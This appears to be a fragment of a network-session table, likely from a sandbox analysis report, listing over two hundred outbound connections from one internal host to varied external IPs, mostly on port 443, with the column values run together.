                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27882192.168.2.234589272.112.106.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27883192.168.2.2352998150.197.90.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27884192.168.2.2338494103.71.248.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27885192.168.2.2358454183.218.217.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27886192.168.2.2356576193.69.209.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27887192.168.2.235836498.41.182.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27888192.168.2.235887845.196.41.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27889192.168.2.2341172118.206.13.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27890192.168.2.2333338105.123.223.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27891192.168.2.233928647.205.63.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27892192.168.2.2350728161.238.58.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27893192.168.2.2345766129.95.118.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27894192.168.2.233410819.146.137.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27895192.168.2.2350230169.145.149.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27896192.168.2.233989644.109.37.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27897192.168.2.2336728193.63.203.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27898192.168.2.2355420143.250.81.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27899192.168.2.233373646.86.151.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27900192.168.2.2339146202.99.74.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27901192.168.2.2339564113.54.187.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27902192.168.2.2353332156.173.113.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27903192.168.2.2356122185.101.192.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27904192.168.2.2340030135.255.143.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27905192.168.2.234557692.213.64.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27906192.168.2.2339212107.16.3.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27907192.168.2.2357930125.38.88.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27908192.168.2.2350388135.210.106.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27909192.168.2.235259657.93.76.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27910192.168.2.23595848.74.195.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27911192.168.2.2348278131.72.90.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27912192.168.2.2345664168.56.125.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27913192.168.2.2353146152.163.168.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27914192.168.2.233610876.188.14.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27915192.168.2.2338152164.224.227.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27916192.168.2.233869285.254.163.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27917192.168.2.234029669.147.24.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27918192.168.2.23437621.33.136.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27919192.168.2.2336980144.207.173.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27920192.168.2.2342738159.61.183.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27921192.168.2.235375880.86.206.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27922192.168.2.2335630133.200.224.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27923192.168.2.2354660221.146.126.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27924192.168.2.233808478.93.99.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27925192.168.2.234758070.185.41.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27926192.168.2.233467468.1.4.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27927192.168.2.235202674.1.179.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27928192.168.2.2358074146.46.217.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27929192.168.2.2345510112.35.58.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27930192.168.2.2357928173.212.237.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27931192.168.2.2340716202.11.66.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27932192.168.2.2353584206.244.76.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27933192.168.2.233281480.64.175.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27934192.168.2.235679484.160.138.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27935192.168.2.233910278.164.236.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27936192.168.2.2346132182.124.125.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27937192.168.2.2350570132.192.156.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27938192.168.2.2346650106.8.255.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27939192.168.2.233926839.143.169.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27940192.168.2.2335822102.228.88.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27941192.168.2.2357594221.105.100.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27942192.168.2.2359348164.59.46.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27943192.168.2.2360396150.206.95.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27944192.168.2.2333340219.219.179.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27945192.168.2.2359922115.250.168.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27946192.168.2.2359092166.81.29.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27947192.168.2.2338994101.117.56.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27948192.168.2.236043448.188.230.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27949192.168.2.2335256205.189.29.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27950192.168.2.2351710135.149.208.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27951192.168.2.233361853.27.9.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27952192.168.2.2350830216.121.55.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27953192.168.2.235594463.100.247.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27954192.168.2.2335752161.216.88.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27955192.168.2.234912670.209.128.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27956192.168.2.2349422189.142.229.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27957192.168.2.2340064161.39.247.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27958192.168.2.233856081.114.202.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27959192.168.2.234579483.116.168.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27960192.168.2.2352934137.50.178.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27961192.168.2.2349974211.125.58.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27962192.168.2.2334196154.184.150.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27963192.168.2.233615634.250.147.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27964192.168.2.234590865.99.193.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27965192.168.2.234964098.9.17.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27966192.168.2.2336274168.90.128.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27967192.168.2.2338186102.83.217.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27968192.168.2.2346446100.147.21.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27969192.168.2.2347334208.85.44.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27970192.168.2.235458662.144.248.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27971192.168.2.2344196169.87.176.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27972192.168.2.233543835.126.226.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27973192.168.2.235272875.38.44.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27974192.168.2.235003466.169.169.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27975192.168.2.233971892.156.219.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27976192.168.2.235825419.150.31.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27977192.168.2.233505624.151.59.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27978192.168.2.2342330219.77.5.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27979192.168.2.2353894154.244.72.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27980192.168.2.233759279.147.78.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27981192.168.2.234461853.65.73.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27982192.168.2.234249452.125.4.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27983192.168.2.2347838121.6.168.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27984192.168.2.2333698176.196.184.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27985192.168.2.2358450166.29.53.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27986192.168.2.2338900206.45.166.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27987192.168.2.235036413.131.0.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27988192.168.2.2335598202.33.114.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27989192.168.2.234206078.241.62.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27990192.168.2.235215235.90.139.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27991192.168.2.2352272200.189.33.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27992192.168.2.2357014180.86.232.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27993192.168.2.2357464115.3.203.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27994192.168.2.23330428.190.73.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27995192.168.2.2343756162.255.78.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27996192.168.2.233785695.232.166.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27997192.168.2.2333178140.119.219.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27998192.168.2.235238897.22.33.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27999192.168.2.2336676147.117.240.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28000192.168.2.2336972204.232.193.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28001192.168.2.2335702124.101.49.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28002192.168.2.2355048217.108.149.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28003192.168.2.235377817.52.225.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28004192.168.2.2348408178.121.27.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28005192.168.2.235112862.44.24.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28006192.168.2.2345476173.229.111.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28007192.168.2.235365435.94.1.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28008192.168.2.2342402148.9.53.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28009192.168.2.234940257.58.139.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28010192.168.2.2348654206.147.4.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28011192.168.2.234887285.12.190.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28012192.168.2.235326680.94.67.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28013192.168.2.2333602187.225.205.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28014192.168.2.234133472.194.7.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28015192.168.2.2355392180.13.147.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28016192.168.2.233542282.65.192.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28017192.168.2.2348338184.114.241.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28018192.168.2.233679449.33.162.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28019192.168.2.234022270.91.170.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28020192.168.2.2336012142.68.113.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28021192.168.2.2333166209.214.175.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28022192.168.2.235890043.46.253.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28023192.168.2.2355264175.29.20.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28024192.168.2.2336154158.252.245.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28025192.168.2.23419588.233.32.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28026192.168.2.235266278.226.49.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28027192.168.2.2352160133.63.198.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28028192.168.2.236040451.150.206.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28029192.168.2.2344286101.156.89.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28030192.168.2.234801250.20.141.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28031192.168.2.2337810200.121.174.148080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28032192.168.2.234787218.214.131.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28033192.168.2.2344018130.155.236.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28034192.168.2.234086464.144.180.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28035192.168.2.2345798223.167.252.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28036192.168.2.23551068.178.172.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28037192.168.2.2355698153.35.251.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28038192.168.2.2349322218.187.30.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28039192.168.2.2355436220.20.114.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28040192.168.2.2348942111.23.83.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28041192.168.2.2338354105.212.185.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28042192.168.2.236099291.82.63.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28043192.168.2.2347850175.162.52.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28044192.168.2.235512657.38.67.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28045192.168.2.235608886.21.25.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28046192.168.2.2350022167.209.91.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28047192.168.2.233462276.90.180.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28048192.168.2.234713844.206.78.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28049192.168.2.2337556211.153.156.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28050192.168.2.235305442.72.134.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28051192.168.2.233416665.78.194.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28052192.168.2.234347414.188.30.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28053192.168.2.2358614142.118.28.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28054192.168.2.2336308152.5.224.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28055192.168.2.2358624211.218.157.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28056192.168.2.235928490.85.161.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28057192.168.2.2347794191.146.44.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28058192.168.2.2348652130.32.137.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28059192.168.2.235602041.254.247.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28060192.168.2.2356272216.28.119.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28061192.168.2.2339796194.153.199.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28062192.168.2.2348994187.2.213.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28063192.168.2.2338992184.213.244.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28064192.168.2.233738863.67.127.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28065192.168.2.2335094184.46.77.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28066192.168.2.2343982188.8.24.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28067192.168.2.2344964107.137.167.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28068192.168.2.234478893.52.209.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28069192.168.2.2354108131.57.109.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28070192.168.2.2353904118.161.103.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28071192.168.2.2358164105.51.233.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28072192.168.2.233972435.145.254.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28073192.168.2.2352134206.114.18.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28074192.168.2.235851884.171.33.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28075192.168.2.234546264.10.135.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28076192.168.2.2350684189.162.4.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28077192.168.2.235111268.91.65.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28078192.168.2.234929640.158.81.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28079192.168.2.234466477.196.228.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28080192.168.2.2335960106.176.13.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28081192.168.2.2359484119.147.180.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28082192.168.2.2338928109.247.168.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28083192.168.2.23607325.62.227.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28084192.168.2.233593293.80.70.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28085192.168.2.2359590199.193.108.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28086192.168.2.233906820.0.51.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28087192.168.2.2345106154.46.101.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28088192.168.2.2350366183.51.37.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28089192.168.2.23454168.103.106.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28090192.168.2.2355484209.190.197.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28091192.168.2.2342804213.215.82.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28092192.168.2.234781873.95.168.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28093192.168.2.2354238144.142.106.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28094192.168.2.233587645.225.207.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28095192.168.2.2336648166.8.215.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28096192.168.2.23427904.128.131.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28097192.168.2.2339342164.231.76.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28098192.168.2.2354480189.211.239.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28099192.168.2.2333790200.15.245.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28100192.168.2.2348976137.234.219.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28101192.168.2.234886278.37.80.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28102192.168.2.23348065.155.228.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
